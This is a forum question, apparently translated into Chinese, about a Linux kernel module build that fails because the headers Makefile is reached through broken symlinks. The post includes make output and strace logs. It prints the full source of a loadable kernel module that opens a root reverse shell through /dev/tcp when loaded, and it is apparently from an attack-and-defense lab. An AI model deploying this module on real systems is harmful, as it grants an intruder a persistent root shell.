我有一个简单的内核模块,可以创建反向 shell。
我这样创建了我的 Makefile:
cat << EOF > Makefile
obj-m +=${module_name}.o
all:
make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
clean:
make -C /lib/modules/$(uname -r)/build M=$(pwd) clean
EOF
但是当我运行make
命令时它失败了:
root@ubuntu:~/moduletest# make
make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-1045-aws'
make[1]: Makefile: No such file or directory
make[1]: *** No rule to make target 'Makefile'. Stop.
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-1045-aws'
Makefile:3: recipe for target 'all' failed
make: *** [all] Error 2
我检查了该文件夹:
/lib/modules/5.4.0-1045-aws/build
但它似乎是一个引用其他符号链接的符号链接:
/lib/modules/5.4.0-1045-aws/build -> /usr/src/linux-headers-5.4.0-1045-aws -> ../linux-aws-headers-5.4.0-1045/Makefile
最后一个文件../linux-aws-headers-5.4.0-1045/Makefile
是:
/usr/src/linux-aws-5.4-headers-5.4.0-1045/Makefile
为什么make
命令无法访问这些链接?
资源:
我的内核模块:
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/127.0.0.1/8000 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init bobo_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit bobo_exit(void) {
}
module_init(bobo_init);
module_exit(bobo_exit);
创建变量后我的 Makefile:
obj-m +=bobo.o
all:
make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev modules
clean:
make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev clean
使用 Strace 进行调试:
我运行测试:
strace -f -yy -q -e trace=%file -o make.strace make
以下是它搜索但未找到的日志:
15770 getcwd("/home/ubuntu/moduletest", 4096) = 24
15770 chdir("/lib/modules/5.4.0-1045-aws/build") = 0
15770 stat("/usr/include", {st_mode=S_IFDIR|0755, st_size=16384, ...}) = 0
15770 stat("/usr/gnu/include", 0x7ffc9d9319c0) = -1 ENOENT (No such file or directory)
15770 stat("/usr/local/include", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
15770 stat("/usr/include", {st_mode=S_IFDIR|0755, st_size=16384, ...}) = 0
15770 getcwd("/usr/src/linux-headers-5.4.0-1045-aws", 4096) = 38
15770 stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
15770 openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3</usr/src/linux-headers-5.4.0-1045-aws>
15770 openat(AT_FDCWD, "Makefile", O_RDONLY) = -1 ENOENT (No such file or directory)
使用 Strace -v 进行调试:
16954 getcwd("/home/ubuntu/moduletest", 4096) = 24
16954 chdir("/lib/modules/5.4.0-1045-aws/build") = 0
16954 stat("/usr/include", {st_dev=makedev(202, 1), st_ino=4731, st_mode=S_IFDIR|0755, st_nlink=33, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=32, st_size=16384, st_atime=1578850669 /* 2020-01-12T17:37:49.317948774+0000 */, st_atime_nsec=317948774, st_mtime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_mtime_nsec=734597829, st_ctime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_ctime_nsec=734597829}) = 0
16954 stat("/usr/gnu/include", 0x7ffeeaeac360) = -1 ENOENT (No such file or directory)
16954 stat("/usr/local/include", {st_dev=makedev(202, 1), st_ino=80156, st_mode=S_IFDIR|0755, st_nlink=2, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1578850475 /* 2020-01-12T17:34:35.054101307+0000 */, st_atime_nsec=54101307, st_mtime=1578850402 /* 2020-01-12T17:33:22.535948295+0000 */, st_mtime_nsec=535948295, st_ctime=1578850748 /* 2020-01-12T17:39:08.492615551+0000 */, st_ctime_nsec=492615551}) = 0
16954 stat("/usr/include", {st_dev=makedev(202, 1), st_ino=4731, st_mode=S_IFDIR|0755, st_nlink=33, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=32, st_size=16384, st_atime=1578850669 /* 2020-01-12T17:37:49.317948774+0000 */, st_atime_nsec=317948774, st_mtime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_mtime_nsec=734597829, st_ctime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_ctime_nsec=734597829}) = 0
16954 getcwd("/usr/src/linux-headers-5.4.0-1045-aws", 4096) = 38
16954 stat(".", {st_dev=makedev(202, 1), st_ino=1117295, st_mode=S_IFDIR|0755, st_nlink=7, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1644324103 /* 2022-02-08T12:41:43.401883198+0000 */, st_atime_nsec=401883198, st_mtime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_mtime_nsec=297502175, st_ctime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_ctime_nsec=297502175}) = 0
16954 openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3</usr/src/linux-headers-5.4.0-1045-aws>
16954 openat(AT_FDCWD, "Makefile", O_RDONLY) = -1 ENOENT (No such file or directory)
16954 openat(AT_FDCWD, "/usr/share/locale/C.UTF-8/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
我跑:
root@ubuntu:~/moduletest# ls -ldi /usr/src/linux-headers-5.4.0-1045-aws/Makefile
1147184 lrwxrwxrwx 1 root root 40 Apr 13 2021 /usr/src/linux-headers-5.4.0-1045-aws/Makefile -> ../linux-aws-headers-5.4.0-1045/Makefile
root@ubuntu:~# ls -ldi /usr/src/linux-headers-5.4.0-1045-aws
1117295 drwxr-xr-x 7 root root 4096 Feb 7 09:28 /usr/src/linux-headers-5.4.0-1045-aws
root@ubuntu:~/moduletest# cat make.strace | grep 7295
16954 stat(".", {st_dev=makedev(202, 1), st_ino=1117295, st_mode=S_IFDIR|0755, st_nlink=7, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1644324103 /* 2022-02-08T12:41:43.401883198+0000 */, st_atime_nsec=401883198, st_mtime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_mtime_nsec=297502175, st_ctime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_ctime_nsec=297502175}) = 0
root@ip-172-31-23-181:~/moduletest#